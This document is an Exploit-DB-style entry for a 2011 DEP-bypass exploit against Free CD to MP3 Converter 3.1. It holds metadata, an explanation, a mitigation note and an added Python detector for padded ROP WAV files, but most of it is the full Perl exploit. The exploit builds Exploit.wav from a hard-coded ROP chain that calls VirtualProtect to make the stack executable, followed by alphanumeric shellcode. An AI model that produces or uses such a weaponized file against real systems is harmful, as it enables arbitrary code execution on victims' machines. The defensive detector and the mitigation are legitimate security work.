Vendor: Free CD to MP3 Converter
By: C4SS!0 G0M3S
CVSS: 7.2 (HIGH)
Title: Universal DEP Bypass
CWE: 20
Product Name: Free CD to MP3 Converter
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:illusions:free_cd_to_mp3_converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WIN-XP SP3 Brazilian Portuguese
Year: 2011

Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit

This exploit chains three Win32 API calls to bypass Data Execution Prevention (DEP) in Free CD to MP3 Converter 3.1: LoadLibraryA("kernel32.dll") to obtain the module handle, GetProcAddress(EAX, "VirtualProtect") to resolve VirtualProtect from that handle, and finally VirtualProtect(ESP, 0x400, 0x40, 0x10007064), which re-protects 0x400 bytes at the stack pointer as PAGE_EXECUTE_READWRITE (0x40) so that the shellcode placed there can execute. Every gadget and function address in the chain is hard-coded; the ROP sequence is carried in an oversized Exploit.wav that the player parses.

Mitigation:

Ensure that Data Execution Prevention (DEP) is enabled and properly configured. DEP on its own does not stop this particular chain, since every gadget address in the listing is fixed: the modules those addresses live in must also be relocated or randomised (ASLR) for the chain to fail, and the application should not be run on a platform, such as the tested Windows XP SP3, that cannot provide this.
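
A defender-side triage heuristic for the file format this entry abuses, as an added example that is not part of the Exploit-DB entry or the author's code. It flags a ".wav" that has no RIFF/WAVE header, opens with a long run of one filler byte and is followed by dwords that look like 32-bit user-mode pointers; the thresholds, the address range and both sample files are constructed assumptions.

```python
import struct

# Constructed thresholds: a real WAV never opens with a kilobyte of one repeated
# byte, and a ROP chain is a run of little-endian user-mode pointers.
FILLER_RUN_MIN = 1024
PTR_LO, PTR_HI = 0x00400000, 0x7FFFFFFF  # 32-bit Windows user-mode image range
MIN_POINTERS = 4                         # pointer-like dwords needed out of 8 checked

def has_riff_wave_header(data: bytes) -> bool:
    """A well-formed WAV starts 'RIFF', a 4-byte size, then 'WAVE'."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WAVE"

def longest_filler_run(data: bytes) -> tuple[int, int]:
    """Return (length, end_offset) of the longest run of one repeated byte."""
    best_len, best_end, i = 0, 0, 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best_len:
            best_len, best_end = j - i, j
        i = j
    return best_len, best_end

def pointer_like_dwords(data: bytes, offset: int, count: int) -> int:
    """Count dwords at offset that lie in the image range and are not plain ASCII."""
    hits = 0
    for k in range(count):
        chunk = data[offset + 4 * k: offset + 4 * k + 4]
        if len(chunk) < 4:
            break
        (value,) = struct.unpack("<I", chunk)
        printable = all(0x20 <= b <= 0x7E for b in chunk)
        if PTR_LO <= value <= PTR_HI and not printable:
            hits += 1
    return hits

def looks_like_padded_rop_wav(data: bytes) -> bool:
    """True when there is no WAV header, a long filler run, then pointer-like dwords."""
    if has_riff_wave_header(data):
        return False
    run_len, run_end = longest_filler_run(data)
    return run_len >= FILLER_RUN_MIN and pointer_like_dwords(data, run_end, 8) >= MIN_POINTERS

# Constructed samples (not the entry's payload): a minimal real WAV header and a
# file shaped like the one described above, with made-up gadget addresses.
BENIGN_WAV = b"RIFF" + struct.pack("<I", 36) + b"WAVEfmt " + b"\x00" * 20 + b"data" + b"\x00" * 4
SUSPECT = (b"A" * 4112
           + struct.pack("<IIII", 0x0040A1B2, 0x0041C3D4, 0x6F2C1020, 0x00427E01)
           + b"kernel32.dll\x00" + b"A" * 27)
```

The check is a cheap first pass for a file-type mismatch on inbound media, not a parser of the player's WAV handling; a positive result should be followed by inspection of the pointer values against the loaded module map.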

Exploit-DB raw data:

#!/usr/bin/perl
#
#[+]Exploit Title: Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit
#[+]Date: 07\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Version: 3.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#Dep bypass method: 
#LoadLibraryA("kernel32.dll") + GetProcAddress(%EAX,"VirtualProtect") + VirtualProtect(%ESP,0x400,0x40,0x10007064) == Universal DEP BYPASS. :)
# 
#

print q{

		Created By C4SS!0 G0M3S	
		E-mail louredo_@hotmail.com
		Blog net-fuzzer.blogspot.com
		
};
sleep(2);
# Address for LoadLibraryA 0x672CA660
##################################ROP FOR LOAD "kernel32.dll"#############################################
my $rop = pack('V',0x00418764); # POP ESI # RETN  
$rop .= pack('V',0x672CA660); # Address to LoadLibraryA
$rop .= pack('V',0x00412d09); # POP EBP # RETN
$rop .= pack('V',0x004AD39B); # ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN  // Return address after the LoadLibraryA call
$rop .= pack('V',0x00472be9); # PUSHAD # POP EBX # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 27;
##################################ROP END HERE###########################################################

# Address for GetProcAddress 0x672CA668
##################################ROP FOR Function GetProcAddress########################################
$rop .= pack('V',0x0048004d);  # POP EBP # RETN  
$rop .= "\x00\x00\x00\x00";
$rop .= pack('V',0x00409a7f);  # POP EDI # RETN
$rop .= pack('V',0x672CA668);  # Address for GetProcAddress
$rop .= pack('V',0x0042ad45);  # PUSH ESP # POP ESI # RETN
$rop .= pack('V',0x004a1b0e);  # POP ESI # RETN 
$rop .= pack('V',0x004AD39B);  # ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN  // Return address after the GetProcAddress call
$rop .= pack('V',0x00421953);  # ADD EBP,EAX # RETN
$rop .= pack('V',0x004c0634);  # PUSHAD # RETN 
$rop .= "VirtualProtect\x00";
$rop .= "A" x 25;
##################################ROP END HERE###########################################################

#################################ROP FOR VirtualProtect#################################################
$rop .= pack('V',0x0042c786);  # XCHG EAX,ESI # RETN // Address of VirtualProtect (returned in EAX)
$rop .= pack('V',0x004d2c70);  # POP EBP # RETN
$rop .= pack('V',0x0047E58B);  # JMP ESP // Return address after the VirtualProtect call
$rop .= pack('V',0x0046abf7);  # POP EBX # RETN
$rop .= pack('V',0x00000400);  # dwSize value
$rop .= pack('V',0x00402bb4);  # POP EDX # RETN 
$rop .= pack('V',0x00000040);  # flNewProtect value (PAGE_EXECUTE_READWRITE)
$rop .= pack('V',0x10002b9c);  # POP ECX # RETN 
$rop .= pack('V',0x10007064);  # lpflOldProtect value
$rop .= pack('V',0x00472be9);  # PUSHAD # POP EBX # RETN 
#################################ROP END HERE###########################################################
my $shellcode = 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK".
"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO".
"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9". #Shellcode Alpha Numeric WinExec "Calc.exe"
"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ". #Baseaddress EAX.
"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN".
"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8".
"WDN0SUK8WOMV4DNNTWPYWN27KA";

my $buf = "A" x 4112;
$buf .= $rop;
$buf .= "\x8B\xC4\x83\xC0\x20\xFF\xD0".("A" x 21).$shellcode;
print "\t\t[+]Creating File Exploit.wav...\n";
sleep(1);
open(f,">Exploit.wav") || die "[-]Error: $!\n";
print f $buf;
close f;
print "\t\t[+]File Exploit.wav Created Successfully.\n";
sleep(1);